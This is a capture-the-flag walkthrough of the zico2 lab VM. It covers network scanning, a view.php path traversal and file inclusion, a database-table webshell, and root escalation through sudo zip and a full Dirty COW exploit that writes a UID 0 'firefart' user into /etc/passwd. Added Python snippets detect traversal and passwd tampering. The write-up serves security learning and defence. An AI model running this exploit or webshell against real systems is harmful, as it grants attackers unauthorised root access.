1. Target machine setup

zico2 target machine download: 1

After downloading you get an .ova file; open it with VMware.

When importing the VM, fill in the VM name and storage location.

The import failed here for some reason; clicking Retry works.

2. Host discovery

1. Host discovery with arp-scan

The other addresses here are the IPs of my other VMs.

2. Host discovery with msf

I had just gone over the msf basics the day before yesterday, so I wanted to try using the exp modules in msf for host discovery as well.

Here the auxiliary/scanner/discovery/arp_sweep module is used for host discovery.

Use set rhosts 192.168.72.1/24 to set the target subnet.

Use set threads 100 to set the number of threads.

Use run to start the scan.

3. Port scanning

1. Port scan with nmap

2. Port scan with msf

A web service is running on port 80.

4. Visiting the web page

There isn't much on the page to interact with.

Clicking CHECK THEM OUT! redirects to the showcase page.

Looking at the parameter passed in the URL, I suspect a file read vulnerability.

With directory traversal, /etc/passwd can be read.

Directory scanning

During directory scanning, a path was found.

Visit that path.

Log in with the weak password admin.

The info table in the test_users database holds two sets of credentials:

```
root:34kroot34
zico: zico2215@
```

Both are fake.

Copy the path shown here and append it to the page parameter of view.php.

The page changes, so this is a file inclusion vulnerability.
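The page parameter of view.php above is used both for the traversal read of /etc/passwd and for including the database file. As an added example (not code from the target or from this post), here is the vulnerable pattern beside a hardened resolver and a small log-side detector in Python; the directory /var/www/html/view and the allowed page names are assumptions.

```python
from pathlib import Path
from urllib.parse import unquote

# Constructed example: the page directory and the allowed page names are
# assumptions, not taken from the zico2 target.
PAGES_DIR = Path("/var/www/html/view")
ALLOWED_PAGES = {"home", "gallery", "contact"}


def unsafe_page_path(page: str) -> Path:
    """The vulnerable pattern behind view.php?page=...: the user value is joined
    to the base directory with no validation. '../' segments walk out of
    PAGES_DIR, and an absolute value replaces the base entirely (pathlib's
    join semantics match what include() does with such a string)."""
    return PAGES_DIR / page


def safe_page_path(page: str) -> Path:
    """Hardened resolver: accept only allowlisted names, then confirm the
    resolved path is still inside PAGES_DIR. The allowlist is the real
    control; the containment check is defence in depth if the list grows."""
    if page not in ALLOWED_PAGES:
        raise ValueError(f"page not allowed: {page!r}")
    base = PAGES_DIR.resolve()
    # resolve() normalises '..' and follows symlinks without requiring the
    # file to exist, so the check also works offline.
    candidate = (base / f"{page}.php").resolve()
    if base not in candidate.parents:
        raise ValueError("resolved path escapes the page directory")
    return candidate


def is_traversal_attempt(page: str) -> bool:
    """Log-side detector for the raw parameter value: decodes single and
    double URL encoding, then flags '..' segments, absolute paths and NUL
    bytes (the old include() truncation trick)."""
    decoded = unquote(unquote(page))
    if "\x00" in decoded or decoded.startswith("/"):
        return True
    return ".." in decoded.replace("\\", "/").split("/")


if __name__ == "__main__":
    # Constructed request values, as they would appear in an access log.
    for value in ("gallery", "../../../../etc/passwd",
                  "%2e%2e/%2e%2e/etc/passwd", "/usr/databases/example.db"):
        print(f"{value!r}: traversal={is_traversal_attempt(value)}")
    print(safe_page_path("gallery"))
```

The detector is meant for access logs or a WAF rule, where the raw value is available; the resolver is what the application itself should do, and the two together cover both the read (traversal) and the include (absolute database path) seen on this target.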

Create a database... and name a table with a one-line webshell.

Include database 1 through the file inclusion vulnerability.

Connect with AntSword.

In the WordPress config file in the home directory, a set of credentials is found.

With those credentials you can ssh in.

5. Privilege escalation

1. Privilege escalation with zip

This user can run zip with sudo.

Escalate privileges through zip.

2. Dirty COW privilege escalation

Exploit:

```c
//
// This exploit uses the pokemon exploit of the dirtycow vulnerability
// as a base and automatically generates a new passwd line.
// The user will be prompted for the new password when the binary is run.
// The original /etc/passwd file is then backed up to /tmp/passwd.bak
// and overwrites the root account with the generated line.
// After running the exploit you should be able to login with the newly
// created user.
//
// To use this exploit modify the user values according to your needs.
// The default is "firefart".
//
// Original exploit (dirtycow's ptrace_pokedata "pokemon" method):
// https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c
//
// Compile with:
// gcc -pthread dirty.c -o dirty -lcrypt
//
// Then run the newly create binary by either doing:
// "./dirty" or "./dirty my-new-password"
//
// Afterwards, you can either "su firefart" or "ssh firefart@..."
//
// DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT!
// mv /tmp/passwd.bak /etc/passwd
//
// Exploit adopted by Christian "FireFart" Mehlmauer
// https://firefart.at
//

#include <fcntl.h>
#include <pthread.h>
#include <string.h>
#include <stdio.h>
#include <stdint.h>
#include <signal.h>      // for kill() / SIGSTOP
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <sys/ptrace.h>
#include <stdlib.h>
#include <unistd.h>
#include <crypt.h>

const char *filename = "/etc/passwd";
const char *backup_filename = "/tmp/passwd.bak";
const char *salt = "firefart";

int f;
void *map;
pid_t pid;
pthread_t pth;
struct stat st;

struct Userinfo {
  char *username;
  char *hash;
  int user_id;
  int group_id;
  char *info;
  char *home_dir;
  char *shell;
};

char *generate_password_hash(char *plaintext_pw) {
  return crypt(plaintext_pw, salt);
}

// Build a complete passwd(5) record from the struct above.
char *generate_passwd_line(struct Userinfo u) {
  const char *format = "%s:%s:%d:%d:%s:%s:%s\n";
  int size = snprintf(NULL, 0, format, u.username, u.hash,
    u.user_id, u.group_id, u.info, u.home_dir, u.shell);
  char *ret = malloc(size + 1);
  sprintf(ret, format, u.username, u.hash, u.user_id,
    u.group_id, u.info, u.home_dir, u.shell);
  return ret;
}

// Repeatedly discards the private mapping; this is one side of the race.
void *madviseThread(void *arg) {
  int i, c = 0;
  for(i = 0; i < 200000000; i++) {
    c += madvise(map, 100, MADV_DONTNEED);
  }
  printf("madvise %d\n\n", c);
  return NULL;
}

int copy_file(const char *from, const char *to) {
  // check if target file already exists
  if(access(to, F_OK) != -1) {
    printf("File %s already exists! Please delete it and run again\n",
      to);
    return -1;
  }

  int ch;   // int, not char, so that EOF is distinguishable from byte 0xFF
  FILE *source, *target;

  source = fopen(from, "r");
  if(source == NULL) {
    return -1;
  }
  target = fopen(to, "w");
  if(target == NULL) {
    fclose(source);
    return -1;
  }

  while((ch = fgetc(source)) != EOF) {
    fputc(ch, target);
  }

  printf("%s successfully backed up to %s\n",
    from, to);

  fclose(source);
  fclose(target);

  return 0;
}

int main(int argc, char *argv[])
{
  // backup file
  int ret = copy_file(filename, backup_filename);
  if (ret != 0) {
    exit(ret);
  }

  struct Userinfo user;
  // set values, change as needed
  user.username = "firefart";
  user.user_id = 0;
  user.group_id = 0;
  user.info = "pwned";
  user.home_dir = "/root";
  user.shell = "/bin/bash";

  char *plaintext_pw;

  if (argc >= 2) {
    plaintext_pw = argv[1];
    printf("Please enter the new password: %s\n", plaintext_pw);
  } else {
    plaintext_pw = getpass("Please enter the new password: ");
  }

  user.hash = generate_password_hash(plaintext_pw);
  char *complete_passwd_line = generate_passwd_line(user);
  printf("Complete line:\n%s\n", complete_passwd_line);

  // Read-only, private (copy-on-write) mapping of the target file.
  f = open(filename, O_RDONLY);
  fstat(f, &st);
  map = mmap(NULL,
             st.st_size + sizeof(long),
             PROT_READ,
             MAP_PRIVATE,
             f,
             0);
  printf("mmap: %lx\n",(unsigned long)map);
  pid = fork();
  if(pid) {
    waitpid(pid, NULL, 0);
    int u, i, o, c = 0;
    int l=strlen(complete_passwd_line);
    // Other side of the race: keep writing the new line into the mapping
    // through ptrace while the child discards the private copy.
    for(i = 0; i < 10000/l; i++) {
      for(o = 0; o < l; o++) {
        for(u = 0; u < 10000; u++) {
          c += ptrace(PTRACE_POKETEXT,
                      pid,
                      map + o,
                      *((long*)(complete_passwd_line + o)));
        }
      }
    }
    printf("ptrace %d\n",c);
  }
  else {
    pthread_create(&pth,
                   NULL,
                   madviseThread,
                   NULL);
    ptrace(PTRACE_TRACEME);
    kill(getpid(), SIGSTOP);
    pthread_join(pth,NULL);
  }

  printf("Done! Check %s to see if the new user was created.\n", filename);
  printf("You can log in with the username '%s' and the password '%s'.\n\n",
    user.username, plaintext_pw);
  printf("\nDON'T FORGET TO RESTORE! $ mv %s %s\n",
    backup_filename, filename);
  return 0;
}
```

Save the exploit above as a .c file and compile it:

```
gcc -pthread <c-source-file> -o <output-file> -lcrypt
```

Run the resulting binary; it prompts us for a new password.

As you can see, a firefart user was successfully added, and it has root privileges.

What we actually did here is use the Dirty COW vulnerability to add a root user to /etc/passwd.
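The exploit above changes /etc/passwd in two ways that are easy to check for afterwards: an account other than root with UID 0, and a password hash stored directly in the second field instead of the x placeholder that defers to /etc/shadow. As an added example (not part of the original post or of the exploit), here is a Python checker that parses passwd content, reports those two conditions, and diffs the live file against the /tmp/passwd.bak backup the exploit writes; the sample file contents and the hash value are constructed.

```python
from typing import NamedTuple


class PasswdEntry(NamedTuple):
    name: str
    passwd: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


# Password-field values that defer to /etc/shadow or lock the account;
# anything else in that field is a hash stored inline in /etc/passwd.
SHADOW_PLACEHOLDERS = {"x", "*", "!", "!!", "*NP*"}


def parse_passwd(text: str) -> list:
    """Parse passwd(5) content. A record with the wrong field count is an
    error rather than skipped: a partial overwrite of the file (the exploit
    writes its line over the start of the file) tends to leave exactly that."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, passwd, uid, gid, gecos, home, shell = fields
        entries.append(PasswdEntry(name, passwd, int(uid), int(gid), gecos, home, shell))
    return entries


def find_suspicious(text: str) -> list:
    """Report the two traces this exploit leaves: a non-root UID 0 account and
    a hash stored inline in /etc/passwd. An empty password field (passwordless
    login) is reported as well."""
    findings = []
    for e in parse_passwd(text):
        if e.uid == 0 and e.name != "root":
            findings.append(f"uid 0 account {e.name!r} (not root)")
        if e.passwd == "":
            findings.append(f"empty password field for {e.name!r}")
        elif e.passwd not in SHADOW_PLACEHOLDERS:
            findings.append(f"password hash stored inline for {e.name!r}")
    return findings


def diff_against_backup(backup_text: str, current_text: str):
    """Compare the live file with the backup the exploit leaves in
    /tmp/passwd.bak; returns (added, removed, changed) account names."""
    before = {e.name: e for e in parse_passwd(backup_text)}
    after = {e.name: e for e in parse_passwd(current_text)}
    added = sorted(set(after) - set(before))
    removed = sorted(set(before) - set(after))
    changed = sorted(n for n in before.keys() & after.keys() if before[n] != after[n])
    return added, removed, changed


# Constructed sample contents (not from the target). The hash is a made-up
# 13-character DES-style value, the shape crypt() produces for a two-character
# salt such as the "fi" of "firefart".
ORIGINAL_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/bin/sh\n"
    "zico:x:1000:1000:zico,,,:/home/zico:/bin/bash\n"
)
MODIFIED_PASSWD = (
    "firefart:fiABCDEFGHIJK:0:0:pwned:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/bin/sh\n"
    "zico:x:1000:1000:zico,,,:/home/zico:/bin/bash\n"
)

if __name__ == "__main__":
    print("original:", find_suspicious(ORIGINAL_PASSWD))
    print("modified:", find_suspicious(MODIFIED_PASSWD))
    print("diff:", diff_against_backup(ORIGINAL_PASSWD, MODIFIED_PASSWD))
```

On a real host the same functions would be fed the contents of /etc/passwd and, if present, /tmp/passwd.bak; the UID 0 check is the one worth running on a schedule, since a left-over backup is only there if the attacker forgot to clean up.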